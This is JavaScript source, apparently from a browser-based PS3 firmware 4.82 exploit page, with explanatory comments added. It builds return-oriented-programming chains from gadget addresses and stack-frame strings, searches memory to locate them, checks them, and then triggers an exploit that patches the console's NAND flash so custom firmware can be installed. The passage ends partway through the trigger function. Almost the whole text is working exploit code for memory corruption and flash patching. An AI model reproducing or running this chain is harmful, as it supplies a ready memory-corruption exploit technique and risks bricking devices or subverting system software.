// Entry point of the "Exploit Initialization" stage shown in the page's UI.
//
// Builds several strings that carry embedded addresses (usb_fp, stack_frame,
// jump_2, jump_1), locates each of them in memory with findJsVariableOffset(),
// reads them back with checkMemory() to confirm they are intact, and then
// enables the trigger button. Search work is bounded by a byte budget
// (search_max_threshold); when it is exhausted the whole function is retried
// via reload() up to max_loops times, after which fail() is reported.
//
// Globals read/written here (declared elsewhere in the page): t_out, used_port,
// usb_fp, usb_fp_addr, stack_frame, stack_frame_addr, jump_2, jump_2_addr,
// jump_1, jump_1_addr, total_loops, max_loops, debug, hr, br, sp_exit and the
// gadget*_addr / toc_addr constants. Returns nothing; all errors are caught
// and reported through logAdd().
function initROP()
{
  try
  {
    // Presumably lock the UI while initialization runs — not verifiable here.
    disable_cb();
    disable_btn();
    // Cancel a pending retry timer left by reload() below.
    if(t_out!=0){clearTimeout(t_out);t_out=0;}

    // Numeric values embedded into the search strings below. Their meaning is
    // not documented on this page; they must be kept exactly as given.
    var sc_sso=0x258;
    var sc_ssc=0x259;
    var sc_ssw=0x25B;
    var ros0_start_sector=0x401;
    var ros1_start_sector=0x3C01;
    var sec_step=0x800;
    var sec_endstep=0x2;
    var flash_id=0x22;
    var flash_flag=0x01000000;
    var flash2_flag=0x00000001; //NAND
    // Total number of bytes the memory searches below may consume across all
    // passes (70 MiB); each pass spends search_size of it.
    var search_max_threshold = 70*0x100000;
    var temp_addr= 0x8A000000;
    var search_base = 0x80100000;
    var search_size = 0x200000;
    var rosdump_addr=0x8C000000;
    var ros0flash_addr=0x8C000000;
    var ros0flash_addr2=0x8C100000;
    var ros0flash_addr3=0x8C200000;
    var ros0flash_addr4=0x8C300000;
    var ros1flash_addr=0x8C000010;
    var ros1flash_addr2=0x8C100010;
    var ros1flash_addr3=0x8C200010;
    var ros1flash_addr4=0x8C300010;
    var fread_mode="rb";

    // Reset the located addresses from any earlier attempt and count this one;
    // total_loops is compared against max_loops by the retry logic.
    usb_fp_addr=0;
    stack_frame_addr=0;
    jump_2_addr=0;
    jump_1_addr=0;
    total_loops++;
    clearLogEntry();

    // Device root path selected by used_port; the three card-slot ports also
    // shift usb_addr by 4 (f_off_start). Any other value falls back to port 0.
    var fp_root;
    var f_off_start=0x0;
    if(used_port===1){fp_root=convertString("xxxx/dev_usb001/");}
    else if(used_port===6){fp_root=convertString("xxxx/dev_usb006/");}
    else if(used_port===1000){fp_root=convertString("xxxxxxxx/dev_sd/");f_off_start=0x4;}
    else if(used_port===1001){fp_root=convertString("xxxxxxxx/dev_cf/");f_off_start=0x4;}
    else if(used_port===1002){fp_root=convertString("xxxxxxxx/dev_ms/");f_off_start=0x4;}
    else {used_port=0;fp_root=convertString("xxxx/dev_usb000/");}

    // First search string: NUL-terminated file path and open mode, followed by
    // filler and embedded addresses (gadget3_addr, toc_addr, gadget7_addr). The
    // leading \u0000 is the tag slot rewritten by replaceAt() on every search pass.
    usb_fp=fp_root+convertString("flash_482.hex")+unescape("\u0000")+convertString(fread_mode)+unescape("\u0000\u0000\u4141\u4141\u4141\u4141")
    +hexw2bin(gadget3_addr)+hexw2bin(toc_addr)+unescape("\u0000\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141")+hexw2bin(gadget7_addr)+hexw2bin(toc_addr)+unescape("\uFD7E");

    // Show progress and schedule a fresh initROP() run in one second.
    function reload()
    {
      showResult(hr+"<h1><b>Exploit Initialization..."+br+"<font color=%22000000%22>Progress: "+((100/max_loops)*total_loops).toString()+"%, please wait...</font></b></h1>");
      t_out=setTimeout(initROP,1000);
    };
    // Give up: reset the attempt counter, report failure and restore the UI.
    function fail()
    {
      total_loops=0;
      showResult(hr+"<h1><b>Exploit Initialization FAILED!</h1><h2><font color=%22000000%22><a href=\"javascript:window.location.reload()\">Refresh this page</a> & try again...</font></b></h2>");
      cleanGUI();
      usb(used_port);
    };

    // Search pass for usb_fp. Before each pass the remaining budget is checked;
    // if a full pass no longer fits, retry the whole function (or fail) and
    // return. NOTE(review): search_base and search_size are passed unchanged on
    // every pass — presumably findJsVariableOffset() advances on its own or the
    // retag forces a fresh copy; cannot be confirmed from this page.
    do
    {
      if(search_max_threshold<search_size){
        if(total_loops<max_loops)reload();
        else fail();
        return;}
      usb_fp=usb_fp.replaceAt(0,hexh2bin(0x7EFD));
      usb_fp_addr=findJsVariableOffset("usb_fp",usb_fp,search_base,search_size);
      search_max_threshold-=search_size;
    }while(usb_fp_addr===0);

    // Addresses derived from where usb_fp was found; they are embedded into
    // stack_frame below. The offsets are fixed by usb_fp's layout above.
    var rb_addr=usb_fp_addr+0x1C;
    var readlen_io=usb_fp_addr+0x22;
    var sc_addr=usb_fp_addr+0x2A;
    var readlen_addr=usb_fp_addr+0x34;
    var dev_handle_addr=usb_fp_addr+0x3C;
    var fopen_addr=usb_fp_addr+0x44;
    var usb_addr=usb_fp_addr+f_off_start;

    // Second search string: mostly filler with the constants and derived
    // addresses from above spliced in at fixed positions. Its byte layout is
    // not documented here and must be preserved exactly. The leading \u0102
    // is the tag slot rewritten by replaceAt() on every search pass.
    stack_frame= unescape("\u0102\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+unescape("\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u0000\u0000")+hexw2bin(toc_addr)+unescape("\u5152\u5354\u5556\u5758\u5960\u6162\u6364")
    +unescape("\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr)+unescape("\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192")
    +unescape("\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556")
    +unescape("\u5758\u5960\u6162")+hexw2bin(sc_sso)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(sc_addr)+unescape("\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\uFF29\uFF29\uFF29")
    +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x20)+unescape("\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u0000\u0000")+hexw2bin(gadget5_addr+0x4)+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384")
    +unescape("\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u8586\u8788")
    +unescape("\u8990\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566")+hexw2bin(flash_flag)+hexw2bin(flash2_flag)+unescape("\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112")
    +unescape("\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576")
    +unescape("\u7778\u7980\u8182\uFF11\uFF11\uFF10\uFF10\u8033\u84F0\u8033\u853E\u0010\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(fopen_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29")
    +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget4_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304")
    +unescape("\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768")
    +unescape("\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x40)+unescape("\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u0000\u0000\u0505\u0505\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132")
    +unescape("\u3334\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596")
    +unescape("\u9798\u9900\u0102\u0304\u0506\u0000\u0259\u1112\u1314\u0000\u0000\u0030\u6000\u0000\u0000")+hexw2bin(readlen_io)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324")
    +unescape("\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u7576\u7778\u7980\u8182\uFFFF\uFFFF\uFFFF")
    +unescape("\uFFFF\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u4344\u4546\u4748\u4950\u0000\u0000")+hexw2bin(temp_addr+0x60)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000\u0047\u5134\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x80)+unescape("\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
    +unescape("\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x200)+hexw2bin(ros0flash_addr)
    +hexw2bin(sec_step)+hexw2bin(ros0_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50000)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x300)+hexw2bin(ros0flash_addr2)
    +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50100)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x400)+hexw2bin(ros0flash_addr3)
    +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50200)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x500)+hexw2bin(ros0flash_addr4)
    +hexw2bin(sec_endstep)+hexw2bin(ros0_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50300)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x600)+hexw2bin(ros1flash_addr)
    +hexw2bin(sec_step)+hexw2bin(ros1_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50400)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x700)+hexw2bin(ros1flash_addr2)
    +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50500)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x800)+hexw2bin(ros1flash_addr3)
    +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50600)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x900)+hexw2bin(ros1flash_addr4)
    +hexw2bin(sec_endstep)+hexw2bin(ros1_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
    +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50700)
    +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
    +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssc)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07")
    +unescape("\uFF06\uFF06\uFF05\uFF05\uFF04\uFF04\uFF03\uFF03\uFF09\uFF09\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
    +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374")
    +unescape("\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
    +unescape("\u0000\u0000")+hexw2bin(temp_addr+0xA00)+unescape("\u0000\u0000")+hexw2bin(sp_exit)+unescape("\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget8_addr)+unescape("\u2F2A");

    // Search pass for stack_frame; same budget / retry / retag scheme as for usb_fp.
    do
    {
      if(search_max_threshold<search_size){
        if(total_loops<max_loops)reload();
        else fail();
        return;}
      stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
      stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base,search_size);
      search_max_threshold-=search_size;
    }while(stack_frame_addr===0);

    // Third string: filler plus the address where stack_frame was found.
    jump_2=unescape("\u0102\u7EFB\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950")
    +hexw2bin(stack_frame_addr)+unescape("\uFB7E");
    // Search pass for jump_2 (same scheme).
    do
    {
      if(search_max_threshold<search_size){
        if(total_loops<max_loops)reload();
        else fail();
        return;}
      jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
      jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
      search_max_threshold-=search_size;
    }while(jump_2_addr===0);

    // Fourth string: short filler plus the address where jump_2 was found.
    jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
    // Search pass for jump_1 (same scheme). jump_1_addr is what triggerX()
    // later hands to trigger().
    do
    {
      if(search_max_threshold<search_size){
        if(total_loops<max_loops)reload();
        else fail();
        return;}
      jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
      jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
      search_max_threshold-=search_size;
    }while(jump_1_addr===0);

    // Integrity check: read each located string back from memory (starting 4
    // bytes before the found address, window 0x100, the string's own length)
    // and require an exact match before enabling the trigger. Any mismatch
    // means the copies have moved or been altered, so retry or fail.
    var u=checkMemory(usb_fp_addr-0x4,0x100,usb_fp.length);
    var j2=checkMemory(jump_2_addr-0x4,0x100,jump_2.length);
    var j1=checkMemory(jump_1_addr-0x4,0x100,jump_1.length);
    if((j2===jump_2)&&(j1===jump_1)&&(u===usb_fp))
    {
      // NOTE(review): unlike the top of the function, t_out is not reset to 0
      // here, so a later call would clearTimeout() a stale id (harmless but
      // inconsistent).
      if(t_out!=0){clearTimeout(t_out);}
      showResult(hr+"<h1><b><font color=%22386E38%22>Exploit Initialization SUCCESS...!</font></b></h1><h3><b><font color=%22000000%22>You can now proceed to patch the NAND Flash Memory!</font></b></h3>");
      enable_trigger();
    }
    else
    {
      logAdd("String mismatch in memory!");
      if(total_loops<max_loops)reload();
      else fail();
    }
  }
  catch(e)
  {
    // Any exception ends this attempt; it is logged with debug temporarily
    // enabled (presumably so logAdd() emits it) and no retry is scheduled.
    debug=true;
    logAdd(br+"Exploit initialization failed because the following exception was thrown during execution:"+br+e);
    debug=false;
  }
}
  205. function triggerX()
  206. {
  207. clearLogEntry();
  208. showResult(hr+"<h1><b>Proceeding to patch NAND Flash Memory...</b></h1><h3><b><font color=%22000000%22>Please wait, the patch operation takes a few minutes!</font></b></h3>");
  209. disable_cb();
  210. disable_btn();
  211. setTimeout(trigger,1000,jump_1_addr);
  212. setTimeout(success,2000,hr+"<h1><b><font color=%22386E38%22>NAND Flash memory patch operation completed..!</font></b></h1><h3><b><font color=%22000000%22>You can dump the NAND now & check that the patch has been applied successfully."+br+"Then reboot to enable the patches & install the 4.82 CFW of your choice...</font></b></h3>");